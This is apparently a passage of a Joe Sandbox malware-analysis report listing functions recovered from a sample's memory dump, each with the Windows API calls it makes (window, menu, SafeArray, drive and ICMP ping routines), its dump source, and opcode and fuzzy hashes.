                    • Instruction Fuzzy Hash: 7F510860A0478429FB34DBA488557EEAFB49F01380F18459F9ED25A3C2EA64DB4CCB55
                    APIs
                    • GetDlgItem.USER32(?,00000001), ref: 00CCC746
                    • GetWindowRect.USER32(00000000,?), ref: 00CCC758
                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00CCC7B6
                    • GetDlgItem.USER32(?,00000002), ref: 00CCC7C1
                    • GetWindowRect.USER32(00000000,?), ref: 00CCC7D3
                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00CCC827
                    • GetDlgItem.USER32(?,000003E9), ref: 00CCC835
                    • GetWindowRect.USER32(00000000,?), ref: 00CCC846
                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00CCC889
                    • GetDlgItem.USER32(?,000003EA), ref: 00CCC897
                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00CCC8B4
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00CCC8C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$ItemMoveRect$Invalidate
                    • String ID:
                    • API String ID: 3096461208-0
                    • Opcode ID: 95e1059f819093d723b072a835e84f16b07d95c0ca3de37c418a4da01ad7a020
                    • Instruction ID: fd30c390604ff4d6846f4aa11775bbfa1d86588ab737bad33b2fa19cef4027a0
                    • Opcode Fuzzy Hash: 95e1059f819093d723b072a835e84f16b07d95c0ca3de37c418a4da01ad7a020
                    • Instruction Fuzzy Hash: 29512E71B00205ABDB18CF69DD99FAEBBB6EF88710F14812DF519D6290DB70AE41CB50
                    APIs
                      • Part of subcall function 00C725DB: GetWindowLongW.USER32(?,000000EB), ref: 00C725EC
                    • GetSysColor.USER32(0000000F), ref: 00C721D3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ColorLongWindow
                    • String ID:
                    • API String ID: 259745315-0
                    • Opcode ID: 9e3c91db7bdaa8736db1a35a64f4be8d471b30a7ac64ea461df7e58bfbc92cb5
                    • Instruction ID: 2cec05708f9135769e9a77e7866539ed0fedc3db62cfbc432ce15783adf2d8cf
                    • Opcode Fuzzy Hash: 9e3c91db7bdaa8736db1a35a64f4be8d471b30a7ac64ea461df7e58bfbc92cb5
                    • Instruction Fuzzy Hash: 86415131100140ABDB255F68DC88BBD3BA5EF06335F25C265FE798A2E6C7318E42DB61
                    APIs
                    • CharLowerBuffW.USER32(?,?,00CFF910), ref: 00CDAB76
                    • GetDriveTypeW.KERNEL32(00000061,00D2A620,00000061), ref: 00CDAC40
                    • _wcscpy.LIBCMT ref: 00CDAC6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BuffCharDriveLowerType_wcscpy
                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                    • API String ID: 2820617543-1000479233
                    • Opcode ID: ce770043e4e44212c05252c982cc271f3a157bda044289456afb9a73641d4ad4
                    • Instruction ID: c28ae314bb203eb49c299b2cdf84d0042ff4c29ddcd50cfe529a081278d4f478
                    • Opcode Fuzzy Hash: ce770043e4e44212c05252c982cc271f3a157bda044289456afb9a73641d4ad4
                    • Instruction Fuzzy Hash: 9F51AF311183019FC710EF18C881AAEB7A5FF95314F14882EF696573A2DB31DE4ADA53
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __i64tow__itow__swprintf
                    • String ID: %.15g$0x%p$False$True
                    • API String ID: 421087845-2263619337
                    • Opcode ID: b0087e90b939fbfeb31acd01406d94ba2688d7333eafd4c6e61d04be276c66dc
                    • Instruction ID: 0c0a804a1626a89c3a7554cb5288b05d97bebee7f307a2811523f49eeebc06c5
                    • Opcode Fuzzy Hash: b0087e90b939fbfeb31acd01406d94ba2688d7333eafd4c6e61d04be276c66dc
                    • Instruction Fuzzy Hash: 8D410671504606AFEF24EB78DC46E7B73E8EB05314F20886EE65DD7281EA319A02DB11
                    APIs
                    • _memset.LIBCMT ref: 00CF73D9
                    • CreateMenu.USER32 ref: 00CF73F4
                    • SetMenu.USER32(?,00000000), ref: 00CF7403
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CF7490
                    • IsMenu.USER32(?), ref: 00CF74A6
                    • CreatePopupMenu.USER32 ref: 00CF74B0
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CF74DD
                    • DrawMenuBar.USER32 ref: 00CF74E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                    • String ID: 0$F
                    • API String ID: 176399719-3044882817
                    • Opcode ID: 355de9a73af0308929c4df82a14c168f8b3bae44a815f9faf7c4aa7fff30cd4a
                    • Instruction ID: b0682185cc3dea3805421ee2a42948478a9051462929c469d0352cc08a015236
                    • Opcode Fuzzy Hash: 355de9a73af0308929c4df82a14c168f8b3bae44a815f9faf7c4aa7fff30cd4a
                    • Instruction Fuzzy Hash: 72413675A00209EFDB21DF64D884BEABBB9FF49310F144129FA6597360D731AA10CF61
                    APIs
                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00CF77CD
                    • CreateCompatibleDC.GDI32(00000000), ref: 00CF77D4
                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00CF77E7
                    • SelectObject.GDI32(00000000,00000000), ref: 00CF77EF
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00CF77FA
                    • DeleteDC.GDI32(00000000), ref: 00CF7803
                    • GetWindowLongW.USER32(?,000000EC), ref: 00CF780D
                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00CF7821
                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00CF782D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                    • String ID: static
                    • API String ID: 2559357485-2160076837
                    • Opcode ID: d0b47b570dc08d1762f42e7fcb0c938df0bb96e025d3855a88a4ee3f75fd899d
                    • Instruction ID: 099ea16927361aff5570b313886740106ddba7b6f679e5d55b76eeafe0348e4f
                    • Opcode Fuzzy Hash: d0b47b570dc08d1762f42e7fcb0c938df0bb96e025d3855a88a4ee3f75fd899d
                    • Instruction Fuzzy Hash: 34316E31105219BBDF125F64DC08FEE3B69EF09360F114329FA25A61A0CB31D912DBA6
                    APIs
                    • _memset.LIBCMT ref: 00C9707B
                      • Part of subcall function 00C98D68: __getptd_noexit.LIBCMT ref: 00C98D68
                    • __gmtime64_s.LIBCMT ref: 00C97114
                    • __gmtime64_s.LIBCMT ref: 00C9714A
                    • __gmtime64_s.LIBCMT ref: 00C97167
                    • __allrem.LIBCMT ref: 00C971BD
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C971D9
                    • __allrem.LIBCMT ref: 00C971F0
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C9720E
                    • __allrem.LIBCMT ref: 00C97225
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C97243
                    • __invoke_watson.LIBCMT ref: 00C972B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction ID: 1cec9a4fc196948d8e42ea5a9e610f288e2f908bf28eea907d38971fd67cf01b
                    • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction Fuzzy Hash: 47710671A15B07EBDF149F79CC49B6AB3B8AF11324F14432AF424E7281E770EA409790
                    APIs
                    • _memset.LIBCMT ref: 00CD2A31
                    • GetMenuItemInfoW.USER32(00D36890,000000FF,00000000,00000030), ref: 00CD2A92
                    • SetMenuItemInfoW.USER32(00D36890,00000004,00000000,00000030), ref: 00CD2AC8
                    • Sleep.KERNEL32(000001F4), ref: 00CD2ADA
                    • GetMenuItemCount.USER32(?), ref: 00CD2B1E
                    • GetMenuItemID.USER32(?,00000000), ref: 00CD2B3A
                    • GetMenuItemID.USER32(?,-00000001), ref: 00CD2B64
                    • GetMenuItemID.USER32(?,?), ref: 00CD2BA9
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CD2BEF
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CD2C03
                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CD2C24
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                    • String ID:
                    • API String ID: 4176008265-0
                    • Opcode ID: 42da76fa8bc6b59865563d7cdb21ef6208c6b5399efd5f08d288d63d8dbad10e
                    • Instruction ID: d9f24e93db2e156b4fa13923b0434f09cdd86d2eecf660126a7fd8fcb5301ee6
                    • Opcode Fuzzy Hash: 42da76fa8bc6b59865563d7cdb21ef6208c6b5399efd5f08d288d63d8dbad10e
                    • Instruction Fuzzy Hash: 436181B0900249AFDB21CF64C888EBE7BB8EF51304F14455BEA5297351D771AE46DB21
                    APIs
                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CF7214
                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CF7217
                    • GetWindowLongW.USER32(?,000000F0), ref: 00CF723B
                    • _memset.LIBCMT ref: 00CF724C
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CF725E
                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CF72D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$LongWindow_memset
                    • String ID:
                    • API String ID: 830647256-0
                    • Opcode ID: 317bcb5ba56722bd90a529e9c758058239bfc400cf34a2c7a1c2e261c27432d2
                    • Instruction ID: 0fb1212eeaae0384c94ef2e3b4b71b34ea71ea91499f0799603f8b7d2c3e0590
                    • Opcode Fuzzy Hash: 317bcb5ba56722bd90a529e9c758058239bfc400cf34a2c7a1c2e261c27432d2
                    • Instruction Fuzzy Hash: 02615975900208AFDB20DFA8CC81EFE77B8AB09710F144259FA15E72A1D774AA46DB61
                    APIs
                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00CC7135
                    • SafeArrayAllocData.OLEAUT32(?), ref: 00CC718E
                    • VariantInit.OLEAUT32(?), ref: 00CC71A0
                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00CC71C0
                    • VariantCopy.OLEAUT32(?,?), ref: 00CC7213
                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00CC7227
                    • VariantClear.OLEAUT32(?), ref: 00CC723C
                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00CC7249
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CC7252
                    • VariantClear.OLEAUT32(?), ref: 00CC7264
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CC726F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                    • String ID:
                    • API String ID: 2706829360-0
                    • Opcode ID: d5e08c9bcebd44ffe18f81fbca3013156b71c3e310b4c79608293bd9c9149f7a
                    • Instruction ID: bb885852005339608b90d92d09c4431fc97e6332344e01723218d59dc5cca29c
                    • Opcode Fuzzy Hash: d5e08c9bcebd44ffe18f81fbca3013156b71c3e310b4c79608293bd9c9149f7a
                    • Instruction Fuzzy Hash: 93414D35A00219EFCB00DF64D848FAEBBB8EF48354F008169F955A7261CB30AA46DF91
                    APIs
                    • WSAStartup.WS2_32(00000101,?), ref: 00CE5AA6
                    • inet_addr.WS2_32(?), ref: 00CE5AEB
                    • gethostbyname.WS2_32(?), ref: 00CE5AF7
                    • IcmpCreateFile.IPHLPAPI ref: 00CE5B05
                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CE5B75
                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CE5B8B
                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00CE5C00
                    • WSACleanup.WS2_32 ref: 00CE5C06
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                    • String ID: Ping
                    • API String ID: 1028309954-2246546115
                    • Opcode ID: f85f7ed8b66726c8530b4693f83a9efa49469d768dffdd39f6ecc5267002d5e7
                    • Instruction ID: 15e3ab76c59f8de32034e154ddc720120db6a13882ae1310b8e697bd061c56d4
                    • Opcode Fuzzy Hash: f85f7ed8b66726c8530b4693f83a9efa49469d768dffdd39f6ecc5267002d5e7
                    • Instruction Fuzzy Hash: FD51A3316047009FDB11EF26CC45B2EBBE4EF48714F14892AF55ADB2A1DB70E940DB56
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00CDB73B
                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00CDB7B1
                    • GetLastError.KERNEL32 ref: 00CDB7BB
                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00CDB828
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Error$Mode$DiskFreeLastSpace
                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                    • API String ID: 4194297153-14809454
                    • Opcode ID: 09d67f7efec79ea09e7260eb3bec2ccbfd08c1f7018decf3647c5791e3f356a5
                    • Instruction ID: 22de8d924451bf98b641f352ffaeea546ce7d5e57c1ee4023ad772c1b3de02ba
                    • Opcode Fuzzy Hash: 09d67f7efec79ea09e7260eb3bec2ccbfd08c1f7018decf3647c5791e3f356a5
                    • Instruction Fuzzy Hash: 2131A235A00209DFDB10EF68D885ABEB7B4EF84700F12802AE616D7391DB719E46D761
                    APIs
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                      • Part of subcall function 00CCB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CCB0E7
                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00CC94F6
                    • GetDlgCtrlID.USER32 ref: 00CC9501
                    • GetParent.USER32 ref: 00CC951D
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CC9520
                    • GetDlgCtrlID.USER32(?), ref: 00CC9529
                    • GetParent.USER32(?), ref: 00CC9545
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00CC9548
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: 079c8843cc0947262770f86c57a936eddd20665befbe0d9ba4afd6020d73b339
                    • Instruction ID: 13d8b185c2da8ddaa27cd8e252d4c9aa5edbc45e93b0b1b1d839189e19c2c9b5
                    • Opcode Fuzzy Hash: 079c8843cc0947262770f86c57a936eddd20665befbe0d9ba4afd6020d73b339
                    • Instruction Fuzzy Hash: A221B270E00108ABCF05ABA4CC85FFEBB74EF45310F104229F561972E1DB755919EB21
                    APIs
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                      • Part of subcall function 00CCB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CCB0E7
                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00CC95DF
                    • GetDlgCtrlID.USER32 ref: 00CC95EA
                    • GetParent.USER32 ref: 00CC9606
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CC9609
                    • GetDlgCtrlID.USER32(?), ref: 00CC9612
                    • GetParent.USER32(?), ref: 00CC962E
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00CC9631
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: cfb41f7faa44682efc42a69d0c08c65f78e1ef6171c68c517bb1a3b69876840b
                    • Instruction ID: eae6088a4e63570c7c136bf5c9b87d875ab656aa1d86dd484085533e79195ca4
                    • Opcode Fuzzy Hash: cfb41f7faa44682efc42a69d0c08c65f78e1ef6171c68c517bb1a3b69876840b
                    • Instruction Fuzzy Hash: CE217175A00208BBDF05ABA0CC95FFEBB78EF58300F104159F961972E1DB759919EB21
                    APIs
                    • GetParent.USER32 ref: 00CC9651
                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00CC9666
                    • _wcscmp.LIBCMT ref: 00CC9678
                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00CC96F3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClassMessageNameParentSend_wcscmp
                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                    • API String ID: 1704125052-3381328864
